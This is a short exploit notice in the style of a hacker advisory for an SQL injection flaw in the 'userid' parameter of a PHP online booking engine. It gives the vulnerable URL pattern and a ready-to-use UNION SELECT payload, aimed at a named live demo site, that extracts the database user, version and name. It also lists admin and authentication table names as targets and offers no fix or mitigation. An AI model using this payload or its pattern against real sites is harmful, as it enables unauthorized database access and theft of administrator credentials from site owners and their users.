#########################################################
#
#    Online Booking engine (userid) SQL Injection Vulnerability
#
#########################################################
#
#    Author: d3b4g
#
#    Home :  www.mvtechies.com
# 
#    email:  bl4ckend[at]gmail[dot]com
#
#                     
#
##########################################################
#    HomE script : http://bookingengine.galaxyweblinks.com/
#                
#    Risk: High
#     
##########################################################
#
#    DorK : N/A
#
##########################################################


-------------------------------------------------------------
Exploit: http://target.com/[path]/service/main.php?userid=[sql]

demo : http://bookingengine.galaxyweblinks.com/calendardemo/service/main.php?userid=85+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,user(),version(),database())/*

some table names ;)

[+] vtcal_adminuser

	
[+] vtcal_auth


Good luck :))


-----------------------------------------------------------
Greetz:st0ke || Hotlism.org || All [[darkc0de.com]] friends 
-----------------------------------------------------------